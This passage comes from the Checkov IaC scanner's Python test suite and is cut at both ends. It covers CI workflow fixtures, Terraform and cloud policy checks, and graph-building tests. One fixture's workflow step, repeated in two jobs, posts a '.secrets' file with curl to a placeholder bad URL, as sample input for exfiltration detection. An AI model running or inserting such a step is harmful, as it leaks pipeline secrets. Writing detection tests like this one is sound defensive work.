                            "__startline__": 35,
                            "__endline__": 36
                        },
                        "run": "terragrunt init\nterragrunt destroy -auto-approve -var-file devl.tfvars\n",
                        "__startline__": 31,
                        "__endline__": 39
                    }
                ],
                "__startline__": 25,
                "__endline__": 39
            },
            "__startline__": 24,
            "__endline__": 39
        },
        "__startline__": 1,
        "__endline__": 39
    }


@pytest.fixture
def workflow_line_numbers_without_image() -> list[tuple[int, str]]:
    return [(1, 'on: pull_request\n'),
            (2, '\n'),
            (3, 'name: unsecure-worfklow\n'),
            (4, '\n'),
            (5, 'jobs:\n'),
            (6, '  unsecure-job:\n'),
            (7, '    name: job2\n'),
            (8, '    runs-on: ubuntu-latest\n'),
            (9, '    env:\n'),
            (10, '      ACTIONS_ALLOW_UNSECURE_COMMANDS: true\n'),
            (11, '    steps:\n'),
            (12, '      - name: unsecure-step2\n'),
            (13, '        run: |\n'),
            (14, '          echo "goo"\n'),
            (15, '  secure-job:\n'),
            (16, '    name: job3\n'),
            (17, '    runs-on: ubuntu-latest\n'),
            (18, '    env:\n'),
            (19, '      ACTIONS_ALLOW_UNSECURE_COMMANDS: false\n'),
            (20, '    run: |\n'),
            (21, '      echo "ok"')]


@pytest.fixture
def image_cached_result() -> dict[str, Any]:
    return {
        "results": [
            {
                "id": "sha256:f9b91f78b0344fa0efc5583d79e78a90556ab0bb3f93fcbc8728b0b70d29a5db",
                "name": "python:3.9-alpine",
                "distro": "Alpine Linux v3.16",
                "distroRelease": "3.16.1",
                "digest": "sha256:83a343afa488ff14d0c807b62770140d2ec30ef2e83a3a45c4ce62c29623e240",
                "collections": ["All"],
                "packages": [{"type": "os", "name": "zlib", "version": "1.2.12-r1", "licenses": ["Zlib"]}],
                "compliances": [],
                "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0},
                "complianceScanPassed": True,
                "vulnerabilities": [
                    {
                        "id": "CVE-2022-37434",
                        "status": "fixed in 1.2.12-r2",
                        "description": "zlib through 1.2.12 has a heap-based buffer over-read ...",
                        "severity": "low",
                        "packageName": "zlib",
                        "packageVersion": "1.2.12-r1",
                        "link": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434",
                        "riskFactors": ["Has fix", "Recent vulnerability"],
                        "impactedVersions": ["<1.2.12-r2"],
                        "publishedDate": "2022-08-05T07:15:00Z",
                        "discoveredDate": "2022-08-08T13:45:43Z",
                        "fixDate": "2022-08-05T07:15:00Z",
                    }
                ],
                "vulnerabilityDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 1, "total": 1},
                "vulnerabilityScanPassed": True,
            }
        ]
    }


@pytest.fixture
def definition() -> dict[str, Any]:
    return {
        "name": "CI",
        "on": {
            "push": {
                "branches": [
                    "main"
                ],
                "__startline__": 4,
                "__endline__": 5
            },
            "__startline__": 3,
            "__endline__": 5
        },
        "jobs": {
            "container-test-job": {
                "runs-on": "ubuntu-latest",
                "container": {
                    "image": "node:14.16",
                    "env": {
                        "NODE_ENV": "development",
                        "__startline__": 11,
                        "__endline__": 12
                    },
                    "ports": [
                        80
                    ],
                    "volumes": [
                        "my_docker_volume:/volume_mount"
                    ],
                    "options": "--cpus 1",
                    "__startline__": 9,
                    "__endline__": 17
                },
                "steps": [
                    {
                        "name": "Check for dockerenv file",
                        "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" <BADURL > /dev/null\n",
                        "__startline__": 18,
                        "__endline__": 23
                    }
                ],
                "__startline__": 7,
                "__endline__": 23
            },
            "second_job": {
                "runs-on": "ubuntu-latest",
                "steps": [
                    {
                        "name": "Check for dockerenv file",
                        "run": "(ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv)\ncurl -X POST -s --data \"@.secrets\" <BADURL > /dev/null\n",
                        "__startline__": 26,
                        "__endline__": 30
                    }
                ],
                "__startline__": 24,
                "__endline__": 30
            },
            "__startline__": 6,
            "__endline__": 30
        },
        "__startline__": 1,
        "__endline__": 30
    }


import unittest

from checkov.terraform.checks.utils.iam_terraform_document_to_policy_converter import \
    convert_terraform_conf_to_iam_policy


class TestIAMConverter(unittest.TestCase):

    def test_iam_converter(self):
        conf = {'version': ['2012-10-17'], 'statement': [{'actions': [['*']], 'resources': [['*']]}]}
        expected_result = {'version': ['2012-10-17'], 'Statement': [{'Action': ['*'], 'Resource': ['*'], 'Effect': 'Allow'}]}
        result = convert_terraform_conf_to_iam_policy(conf)
        self.assertDictEqual(result,expected_result)
        self.assertNotEqual(result,conf)



if __name__ == '__main__':
    unittest.main()



from unittest import mock

import igraph
import pytest
from networkx import DiGraph

from checkov.common.graph.graph_builder import CustomAttributes
from checkov.common.images.image_referencer import Image
from checkov.terraform.image_referencer.provider.azure import AzureTerraformProvider


@pytest.mark.parametrize("graph_framework", ['NETWORKX', 'IGRAPH'])
def test_extract_images_from_resources(graph_framework):
    # given
    resource = {
        "file_path_": "/batch.tf",
        "__end_line__": 25,
        "__start_line__": 1,
        "container_configuration": {
            "container_image_names": ["nginx", "python:3.9-alpine"],
            "container_registries": {
                "password": "myPassword",
                "registry_server": "myContainerRegistry.azurecr.io",
                "user_name": "myUserName",
            },
            "type": "DockerCompatible",
        },
        "resource_type": "azurerm_batch_pool",
    }
    if graph_framework == 'IGRAPH':
        graph = igraph.Graph()
        graph.add_vertex(
            name='1',
            block_type_='resource',
            resource_type=resource[
                CustomAttributes.RESOURCE_TYPE] if CustomAttributes.RESOURCE_TYPE in resource else None,
            attr=resource,
        )
    else:
        graph = DiGraph()
        graph.add_node(1, **resource)

    # when
    with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}):
        azure_provider = AzureTerraformProvider(graph_connector=graph)
        images = azure_provider.extract_images_from_resources()

    # then
    assert images == [
        Image(file_path="/batch.tf", name="nginx", start_line=1, end_line=25, related_resource_id='/batch.tf:None'),
        Image(file_path="/batch.tf", name="python:3.9-alpine", start_line=1, end_line=25, related_resource_id='/batch.tf:None'),
    ]


@pytest.mark.parametrize("graph_framework", ['NETWORKX', 'IGRAPH'])
def test_extract_images_from_resources_with_no_image(graph_framework):
    # given
    resource = {
        "file_path_": "/batch.tf",
        "__end_line__": 25,
        "__start_line__": 1,
        "container_configuration": {
            "container_image_names": [],
            "container_registries": {
                "password": "myPassword",
                "registry_server": "myContainerRegistry.azurecr.io",
                "user_name": "myUserName",
            },
            "type": "DockerCompatible",
        },
        "resource_type": "azurerm_batch_pool",
    }
    if graph_framework == 'IGRAPH':
        graph = igraph.Graph()
        graph.add_vertex(
            name='1',
            block_type_='resource',
            resource_type=resource[
                CustomAttributes.RESOURCE_TYPE] if CustomAttributes.RESOURCE_TYPE in resource else None,
            attr=resource,
        )
    else:
        graph = DiGraph()
        graph.add_node(1, **resource)

    # when
    with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}):
        azure_provider = AzureTerraformProvider(graph_connector=graph)
        images = azure_provider.extract_images_from_resources()

    # then
    assert not images




import os
import unittest
from pathlib import Path

import mock

from checkov.runner_filter import RunnerFilter
from checkov.terraform.checks.resource.gcp.GoogleComputeFirewallUnrestrictedIngress22 import check
from checkov.terraform.runner import Runner


class TestGoogleComputeFirewallUnrestrictedIngress22(unittest.TestCase):
    @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_FOREACH_HANDLING": "True"})
    def test(self):
        # given
        test_files_dir = Path(__file__).parent / "example_GoogleComputeFirewallUnrestrictedIngress22"

        # when
        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))

        # then
        summary = report.get_summary()

        passing_resources = {
            "google_compute_firewall.restricted",
            "google_compute_firewall.allow_null",
            "google_compute_firewall.allow_different_int",
            "google_compute_firewall.firewall_demo[\"firewall-02\"]",
            "google_compute_firewall.firewall_demo[\"firewall-04\"]",
            "google_compute_firewall.firewall_demo[\"firewall-05\"]",
            "google_compute_firewall.firewall_demo[\"firewall-06\"]",
        }

        failing_resources = {
            "google_compute_firewall.allow_multiple",
            "google_compute_firewall.allow_ssh_int",
            "google_compute_firewall.allow_all",
            "google_compute_firewall.firewall_demo[\"firewall-01\"]",
        }

        passed_check_resources = {c.resource for c in report.passed_checks}
        failed_check_resources = {c.resource for c in report.failed_checks}

        self.assertEqual(summary["passed"], len(passed_check_resources))
        self.assertEqual(summary["failed"], len(failed_check_resources))
        self.assertEqual(summary["skipped"], 0)
        self.assertEqual(summary["parsing_errors"], 0)
        self.assertEqual(summary["resource_count"], 12)  # 1 unknown

        self.assertEqual(passing_resources, passed_check_resources)
        self.assertEqual(failing_resources, failed_check_resources)


if __name__ == "__main__":
    unittest.main()



import unittest

from checkov.terraform.checks.resource.aws.EKSControlPlaneLogging import check
from checkov.common.models.enums import CheckResult


class TestEKSControlPlaneLogging(unittest.TestCase):
    def test_failure(self):
        resource_conf = {'name': ['testcluster'], 'enabled_cluster_log_types': [['api', 'audit']]}

        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_failure_empty(self):
        resource_conf = {'name': ['testcluster']}

        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_success(self):
        resource_conf = {'name': ['testcluster'], 'enabled_cluster_log_types': [['api', 'audit', 'authenticator', 'controllerManager', 'scheduler']]}

        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.PASSED, scan_result)

    def test_success(self):
        resource_conf = {'name': ['testcluster'], 'enabled_cluster_log_types': []}

        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)


if __name__ == '__main__':
    unittest.main()



import unittest

from checkov.common.util.type_forcers import convert_prisma_policy_filter_to_dict


class TestTypeForcers(unittest.TestCase):
    def test_convert_prisma_policy_filter_to_dict(self):
        self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,F2=B'), {'F1': 'A', 'F2': 'B'})
        self.assertDictEqual(convert_prisma_policy_filter_to_dict(''), {})
        self.assertDictEqual(convert_prisma_policy_filter_to_dict(None), {})
        self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1 =   A,   F2= B '), {'F1': 'A', 'F2': 'B'})
        self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,B,F2=C'), {'F1': 'A'})
        self.assertDictEqual(convert_prisma_policy_filter_to_dict('F1=A,F2=B,C'), {'F1': 'A', 'F2': 'B'})


if __name__ == '__main__':
    unittest.main()



import unittest

import hcl2

from checkov.terraform.checks.resource.azure.FunctionAppsAccessibleOverHttps import check
from checkov.common.models.enums import CheckResult


class TestFunctionAppsAccessibleOverHttps(unittest.TestCase):

    def test_failure1(self):
        hcl_res = hcl2.loads("""
            resource "azurerm_app_service" "example" {
              name                = "example-app-service"
              location            = azurerm_resource_group.example.location
              resource_group_name = azurerm_resource_group.example.name
              app_service_plan_id = azurerm_app_service_plan.example.id
              https_only          = false
              }
                """)
        resource_conf = hcl_res['resource'][0]['azurerm_app_service']['example']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_failure2(self):
        hcl_res = hcl2.loads("""
            resource "azurerm_app_service" "example" {
              name                = "example-app-service"
              location            = azurerm_resource_group.example.location
              resource_group_name = azurerm_resource_group.example.name
              app_service_plan_id = azurerm_app_service_plan.example.id
            }
                """)
        resource_conf = hcl_res['resource'][0]['azurerm_app_service']['example']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_success(self):
        hcl_res = hcl2.loads("""
            resource "azurerm_app_service" "example" {
              name                = "example-app-service"
              location            = azurerm_resource_group.example.location
              resource_group_name = azurerm_resource_group.example.name
              app_service_plan_id = azurerm_app_service_plan.example.id
              https_only          = true
            }
                """)
        resource_conf = hcl_res['resource'][0]['azurerm_app_service']['example']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.PASSED, scan_result)


if __name__ == '__main__':
    unittest.main()



import json
from datetime import datetime
from typing import Dict, Any

import pytest
from lark import Tree

from checkov.common.util.json_utils import CustomJSONEncoder


@pytest.mark.parametrize(
    "input_dict",
    [
        ({"key": {"v", "val", "value"}}),
        ({"key": datetime.now()}),
        ({"key": Tree("data", ["child_1", "child_2"])}),
        ({"key": lambda x: x}),
    ],
    ids=["set", "date", "lark_tree", "function"],
)
def test_custom_json_encoder(input_dict: Dict[str, Any]):
    # when
    result = json.dumps(input_dict, cls=CustomJSONEncoder)

    # then
    # this assertion should never fail, but json.dumps() could
    assert isinstance(result, str)



from parameterized import parameterized_class

from tests.terraform.graph.checks_infra.test_base import TestBaseSolver
import os
TEST_DIRNAME = os.path.dirname(os.path.realpath(__file__))


@parameterized_class([
   {"graph_framework": "NETWORKX"},
   {"graph_framework": "IGRAPH"}
])
class TestOrQuery(TestBaseSolver):
    def setUp(self):
        self.checks_dir = TEST_DIRNAME
        super(TestOrQuery, self).setUp()

    def test_buckets_with_option_env_tag(self):
        root_folder = '../../../resources/s3_bucket_2'
        check_id = "BucketsWithEnvTag"
        should_pass = ['aws_s3_bucket.public', 'aws_s3_bucket.private']
        should_fail = ['aws_s3_bucket.non_tag']
        expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}

        self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)


from pathlib import Path

from checkov.common.util.parser_utils import eval_string
from checkov.terraform.parser import load_or_die_quietly


def test_eval_string_to_list():
    # given
    expected = ["a", "b", "c"]

    # when
    actual = eval_string('["a", "b", "c"]')

    assert actual == expected


def test__load_or_die_quietly_with_bom():
    # given
    test_file = Path(__file__).parent / "resources/file_bom/with_bom.tf"
    parsing_errors = {}

    # when
    definition = load_or_die_quietly(file=test_file, parsing_errors=parsing_errors)

    # then
    assert not parsing_errors
    assert definition == {
        "resource": [
            {
                "aws_s3_bucket": {
                    "example": {"bucket": ["example"], "__start_line__": 1, "__end_line__": 3},
                },
            }
        ]
    }


def test__load_or_die_quietly_without_bom():
    # given
    test_file = Path(__file__).parent / "resources/file_bom/without_bom.tf"
    parsing_errors = {}

    # when
    definition = load_or_die_quietly(file=test_file, parsing_errors=parsing_errors)

    # then
    assert not parsing_errors
    assert definition == {
        "resource": [
            {
                "aws_s3_bucket": {
                    "example": {"bucket": ["example"], "__start_line__": 1, "__end_line__": 3},
                },
            }
        ]
    }



from checkov.terraform_json.parser import hclify


def test_hclify():
    # given
    bucket_version = {
        "//": {
            "metadata": {
                "path": "AppStack/bucket_version",
                "uniqueId": "bucket_version",
            }
        },
        "bucket": "${aws_s3_bucket.bucket.bucket}",
        "versioning_configuration": {
            "status": "Enabled",
        },
    }

    # when
    result = hclify(obj=bucket_version)

    # then
    assert result == {
        "//": {
            "metadata": {
                "path": "AppStack/bucket_version",
                "uniqueId": "bucket_version",
            }
        },
        "bucket": ["${aws_s3_bucket.bucket.bucket}"],
        "versioning_configuration": [
            {
                "status": ["Enabled"],
            }
        ],
    }



import unittest

import hcl2

from checkov.terraform.checks.resource.gcp.GKEUseCosImage import check
from checkov.common.models.enums import CheckResult


class TestGKEUseCosImage(unittest.TestCase):

    def test_failure(self):
        hcl_res = hcl2.loads("""
    resource "google_container_node_pool" "tfer" {
      autoscaling {
        max_node_count = "4"
        min_node_count = "1"
      }

      cluster            = google_container_cluster.tfer.name
      initial_node_count = "2"
      location           = "us-west1"

      management {
        auto_repair  = "true"
        auto_upgrade = "true"
      }

      max_pods_per_node = "110"
      name              = "async-pool-2"

      node_config {
        disk_size_gb = "400"
        disk_type    = "pd-ssd"
        image_type   = "SomethingElse"

        labels = {
          async = "true"
        }

        local_ssd_count = "0"
        machine_type    = "custom-32-65536"

        metadata = {
          async                    = "true"
          disable-legacy-endpoints = "true"
        }

        oauth_scopes    = ["https://www.googleapis.com/auth/cloud-platform"]
        preemptible     = "false"
        service_account = "default"

        shielded_instance_config {
          enable_integrity_monitoring = "true"
          enable_secure_boot          = "true"
        }
      }

      node_count     = "1"
      node_locations = ["us-west1-b", "us-west1-a"]
      project        = "test-project"

      upgrade_settings {
        max_surge       = "1"
        max_unavailable = "0"
      }

      version = "1.14.10-gke.36"
      zone    = "us-west1"
    }
                    """)
        resource_conf = hcl_res['resource'][0]['google_container_node_pool']['tfer']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_success(self):
        hcl_res = hcl2.loads("""
resource "google_container_node_pool" "tfer" {
  autoscaling {
    max_node_count = "4"
    min_node_count = "1"
  }

  cluster            = google_container_cluster.tfer.name
  initial_node_count = "2"
  location           = "us-west1"

  management {
    auto_repair  = "true"
    auto_upgrade = "true"
  }

  max_pods_per_node = "110"
  name              = "async-pool-2"

  node_config {
    disk_size_gb = "400"
    disk_type    = "pd-ssd"
    image_type   = "COS"

    labels = {
      async = "true"
    }

    local_ssd_count = "0"
    machine_type    = "custom-32-65536"

    metadata = {
      async                    = "true"
      disable-legacy-endpoints = "true"
    }

    oauth_scopes    = ["https://www.googleapis.com/auth/cloud-platform"]
    preemptible     = "false"
    service_account = "default"

    shielded_instance_config {
      enable_integrity_monitoring = "true"
      enable_secure_boot          = "true"
    }
  }

  node_count     = "1"
  node_locations = ["us-west1-b", "us-west1-a"]
  project        = "test-project"

  upgrade_settings {
    max_surge       = "1"
    max_unavailable = "0"
  }

  version = "1.14.10-gke.36"
  zone    = "us-west1"
}
                """)
        resource_conf = hcl_res['resource'][0]['google_container_node_pool']['tfer']
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.PASSED, scan_result)


if __name__ == '__main__':
    unittest.main()



from pathlib import Path

from checkov.circleci_pipelines.runner import Runner
from checkov.common.bridgecrew.bc_source import get_source_type
from checkov.common.bridgecrew.check_type import CheckType

from checkov.runner_filter import RunnerFilter
from pytest_mock import MockerFixture

from tests.common.image_referencer.test_utils import mock_get_empty_license_statuses_async, \
    mock_get_image_cached_result_async

RESOURCES_PATH = Path(__file__).parent.parent / "resources"


def test_circleCI_workflow(mocker: MockerFixture, file_path, image_cached_results_for_report):
    from checkov.common.bridgecrew.platform_integration import bc_integration
    test_file = RESOURCES_PATH / file_path

    runner_filter = RunnerFilter(run_image_referencer=True)
    bc_integration.bc_source = get_source_type("disabled")

    mocker.patch(
        "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async",
        side_effect=mock_get_image_cached_result_async,
    )
    mocker.patch(
        "checkov.common.images.image_referencer.get_license_statuses_async",
        side_effect=mock_get_empty_license_statuses_async,
    )

    reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)

    assert len(reports) == 2

    circleci_report = next(report for report in reports if report.check_type == CheckType.CIRCLECI_PIPELINES)
    sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE)

    assert len(circleci_report.resources) == 0
    assert len(circleci_report.passed_checks) == 32
    assert len(circleci_report.failed_checks) == 13
    assert len(circleci_report.skipped_checks) == 0
    assert len(circleci_report.parsing_errors) == 0

    assert len(sca_image_report.extra_resources) == 10
    assert len(sca_image_report.image_cached_results) == 10

    got_images = ({
                'image_name': image['dockerImageName'],
                'related_resource_id': image['relatedResourceId'],
                'packages': image['packages']
                 } for image in sca_image_report.image_cached_results)
    for image in got_images:
        assert image in image_cached_results_for_report
    assert len(sca_image_report.extra_resources) == 10
    assert len(sca_image_report.image_cached_results) == 10


def test_runner_image_check(file_path):
    test_file = RESOURCES_PATH / file_path
    runner_filter = RunnerFilter(framework=['circleci_pipelines'], checks=['CKV_CIRCLECIPIPELINES_8'])

    report = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter)

    assert len(report.failed_checks) == 0
    assert report.parsing_errors == []
    assert len(report.passed_checks) == 12
    assert report.skipped_checks ==[]



import unittest

from checkov.common.models.enums import CheckResult
from checkov.terraform.checks.resource.aws.DocDBLogging import check


class TestDocDBLogging(unittest.TestCase):

    def test_failure(self):
        resource_conf = {
            "cluster_identifier": "my-docdb-cluster",
        }
        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_failure_partial(self):
        resource_conf = {
            "cluster_identifier": "my-docdb-cluster",
            "enabled_cloudwatch_logs_exports": ["audit"],
        }

        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

    def test_success(self):
        resource_conf = {
            "cluster_identifier": "my-docdb-cluster",
            "enabled_cloudwatch_logs_exports": ["audit", "profiler"],
        }

        scan_result = check.scan_resource_conf(conf=resource_conf)
        self.assertEqual(CheckResult.FAILED, scan_result)

if __name__ == '__main__':
    unittest.main()



import os
from pathlib import Path
from unittest import TestCase

import mock
import json

from checkov.common.graph.db_connectors.networkx.networkx_db_connector import NetworkxConnector
from checkov.common.graph.graph_builder import EncryptionValues, EncryptionTypes
from checkov.common.graph.graph_builder.utils import calculate_hash
from checkov.common.graph.graph_builder.graph_components.attribute_names import CustomAttributes
from checkov.common.util.parser_utils import TERRAFORM_NESTED_MODULE_PATH_PREFIX, TERRAFORM_NESTED_MODULE_PATH_ENDING, \
    TERRAFORM_NESTED_MODULE_INDEX_SEPARATOR
from checkov.terraform.graph_builder.graph_components.block_types import BlockType
from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock
from checkov.terraform.graph_builder.graph_components.generic_resource_encryption import ENCRYPTION_BY_RESOURCE_TYPE
from checkov.terraform.graph_builder.graph_to_tf_definitions import convert_graph_vertices_to_tf_definitions
from checkov.terraform.parser import Parser
from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph
from checkov.terraform.graph_manager import TerraformGraphManager

TEST_DIRNAME = os.path.dirname(os.path.realpath(__file__))


class TestLocalGraph(TestCase):
    def setUp(self) -> None:
        self.source = "TERRAFORM"

    def test_update_vertices_configs_attribute_like_resource_name(self):
        config = {"resource_type": {"resource_name": {"attribute1": 1, "attribute2": 2, "resource_name": ["caution!"]}}}
        attributes = {"attribute1": 1, "attribute2": 2, "resource_name": "ok"}
        local_graph = TerraformLocalGraph(None)
        vertex = TerraformBlock(name="resource_type.resource_name", config=config, path='', block_type=BlockType.RESOURCE, attributes=attributes)
        vertex.changed_attributes["resource_name"] = ""
        local_graph.vertices.append(vertex)
        local_graph.update_vertices_configs()
        expected_config = {"resource_type": {"resource_name": {"attribute1": 1, "attribute2": 2, "resource_name": ["ok"]}}}
        self.assertDictEqual(expected_config, vertex.config)

    def test_single_edge_with_same_label(self):
        resources_dir = os.path.realpath(
            os.path.join(TEST_DIRNAME, '../resources/k8_service'))

        graph_manager = TerraformGraphManager(NetworkxConnector())
        local_graph, _ = graph_manager.build_graph_from_source_directory(resources_dir,
                                                                          render_variables=True)
        edges_hash = []
        for e in local_graph.edges:
            edge_hash = calculate_hash({"origin": e.origin, "dest": e.dest, "label": e.label})
            if edge_hash in edges_hash:
                origin = local_graph.vertices[e.origin]
                dest = local_graph.vertices[e.dest]
                self.fail(f'edge {e} == [{origin} - {e.label} -> {dest}] appears more than once in the graph')
            else:
                edges_hash.append(edge_hash)

    def test_set_variables_values_from_modules(self):
        resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME,
                                                      '../resources/variable_rendering/render_from_module_vpc'))
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, source=self.source)
        local_graph = TerraformLocalGraph(module)
        local_graph._create_vertices()

        variables_before_module_definitions = {
            "cidr": "0.0.0.0/0",
            "private_subnets": [],
            "public_subnets": [],
            "enable_nat_gateway": False,
            "single_nat_gateway": False,
            "enable_dns_hostnames": False,
            "public_subnet_tags": {},
            "private_subnet_tags": {},
        }

        for var_name, var_value in variables_before_module_definitions.items():
            vertex_index = local_graph.vertices_block_name_map[BlockType.VARIABLE].get(var_name)[0]
            vertex = local_graph.vertices[vertex_index]
            default_val = vertex.attributes['default']
            if type(default_val) == list:
                self.assertEqual(var_value, default_val[0])
            else:
                self.assertEqual(var_value, default_val)

        local_graph.build_graph(resources_dir)

        expected_variables_after = {
            "cidr": "172.16.0.0/16",
            "private_subnets": ["172.16.1.0/24", "172.16.2.0/24", "172.16.3.0/24"],
            "public_subnets": ["172.16.4.0/24", "172.16.5.0/24", "172.16.6.0/24"],
            "enable_nat_gateway": True,
            "single_nat_gateway": True,
            "enable_dns_hostnames": True,
            "public_subnet_tags": {"kubernetes.io/cluster/${local.cluster_name}": "shared",
                                    "kubernetes.io/role/elb": "1"},
            "private_subnet_tags": {"kubernetes.io/cluster/${local.cluster_name}": "shared",
                                    "kubernetes.io/role/internal-elb": "1"}
        }

        for var_name, var_value in expected_variables_after.items():
            vertex_index = local_graph.vertices_block_name_map[BlockType.VARIABLE].get(var_name)[0]
            vertex = local_graph.vertices[vertex_index]
            default_val = vertex.attributes['default']
            if type(default_val) == list:
                self.assertEqual(var_value, default_val[0])
            else:
                self.assertEqual(var_value, default_val)

    def test_encryption_aws(self):
        resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME, '../resources/encryption'))
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, self.source)
        local_graph = TerraformLocalGraph(module)
        local_graph._create_vertices()
        local_graph.calculate_encryption_attribute(ENCRYPTION_BY_RESOURCE_TYPE)
        all_attributes = [vertex.get_attribute_dict() for vertex in local_graph.vertices]
        for attribute_dict in all_attributes:
            [resource_type, resource_name] = attribute_dict[CustomAttributes.ID].split(".")
            if resource_type in ENCRYPTION_BY_RESOURCE_TYPE:
                is_encrypted = attribute_dict[CustomAttributes.ENCRYPTION]
                details = attribute_dict[CustomAttributes.ENCRYPTION_DETAILS]
                self.assertEqual(is_encrypted, EncryptionValues.ENCRYPTED.value if resource_name.startswith("encrypted")
                                 else EncryptionValues.UNENCRYPTED.value, f'failed for "{resource_type}.{resource_name}"')
                if is_encrypted == EncryptionValues.ENCRYPTED.value:
                    if 'kms_key_id' in attribute_dict or 'kms_master_key_id' in attribute_dict:
                        self.assertEqual(details, EncryptionTypes.KMS_VALUE.value, f'Bad encryption details for "{resource_type}.{resource_name}"')
                    else:
                        self.assertIn(details, [EncryptionTypes.AES256.value, EncryptionTypes.KMS_VALUE.value, EncryptionTypes.NODE_TO_NODE.value, EncryptionTypes.DEFAULT_KMS.value], f'Bad encryption details for "{resource_type}.{resource_name}"')
                else:
                    self.assertEqual(details, "")
            else:
                self.assertIsNone(attribute_dict.get(CustomAttributes.ENCRYPTION))
                self.assertIsNone(attribute_dict.get(CustomAttributes.ENCRYPTION_DETAILS))

    def test_vertices_from_local_graph(self):
        resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME,
                                                      '../resources/variable_rendering/render_from_module_vpc'))
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, self.source)
        local_graph = TerraformLocalGraph(module)
        local_graph._create_vertices()
        tf_definitions, breadcrumbs = convert_graph_vertices_to_tf_definitions(local_graph.vertices, resources_dir)
        self.assertIsNotNone(tf_definitions)
        self.assertIsNotNone(breadcrumbs)

    @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_NESTED_MODULES": "False"})
    def test_module_dependencies(self):
        resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME, '../resources/modules/stacks'))
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, self.source)
        self.assertEqual(module.module_dependency_map[f'{resources_dir}/prod'], [[]])
        self.assertEqual(module.module_dependency_map[f'{resources_dir}/stage'], [[]])
        self.assertEqual(module.module_dependency_map[f'{resources_dir}/test'], [[]])
        self.assertEqual(module.module_dependency_map[f'{resources_dir}/prod/sub-prod'], [[f'{resources_dir}/prod/main.tf']])
        expected_inner_modules = [
            [f'{resources_dir}/prod/main.tf', f'{resources_dir}/prod/sub-prod/main.tf'],
            [f'{resources_dir}/stage/main.tf'],
            [f'{resources_dir}/test/main.tf']
        ]
        self.assertEqual(module.module_dependency_map[f'{os.path.dirname(resources_dir)}/s3_inner_modules'], expected_inner_modules)
        self.assertEqual(module.module_dependency_map[f'{os.path.dirname(resources_dir)}/s3_inner_modules/inner'],
                         list(map(lambda dep_list: dep_list + [f'{os.path.dirname(resources_dir)}/s3_inner_modules/main.tf'],
                                  expected_inner_modules)))

    @mock.patch.dict(os.environ, {"CHECKOV_ENABLE_NESTED_MODULES": "True"})
    def test_module_dependencies_nested_module_enable(self):
        resources_dir = os.path.realpath(os.path.join(TEST_DIRNAME, '../resources/modules/stacks'))
        hcl_config_parser = Parser()
        module, _ = hcl_config_parser.parse_hcl_module(resources_dir, self.source)
        self.assertEqual(module.module_dependency_map[f'{resources_dir}/prod'], [[]])
        self.assertEqual(module.module_dependency_map[f'{resources_dir}/stage'], [[]])
        self.assertEqual(module.module_dependency_map[f'{resources_dir}/test'], [[]])
        self.assertEqual(module.module_dependency_map[f'{resources_dir}/prod/sub-prod'], [[f'{resources_dir}/prod/main.tf']])
        expected_inner_modules = [
            [
                f'{resources_dir}/prod/main.tf',
                f'{resources_dir}/prod/sub-prod/main.tf{TERRAFORM_NESTED_MODULE_PATH_PREFIX}{resources_dir}/prod/main.tf{TERRAFORM_NESTED_MODULE_INDEX_SEPARATOR}0{TERRAFORM_NESTED_MODULE_PATH_ENDING}',
            ],
            [
                f'{resources_dir}/stage/main.tf'
            ],
            [
                f'{resources_dir}/test/main.tf'
            ],
        ]
        self.assertEqual(module.module_dependency_map[f'{os.path.dirname(resources_dir)}/s3_inner_modules'], expected_inner_modules)
        resources_dir_no_stacks = resources_dir.replace('/stacks', '')
        expected_inner_modules = [
            [
                f'{resources_dir}/prod/main.tf',
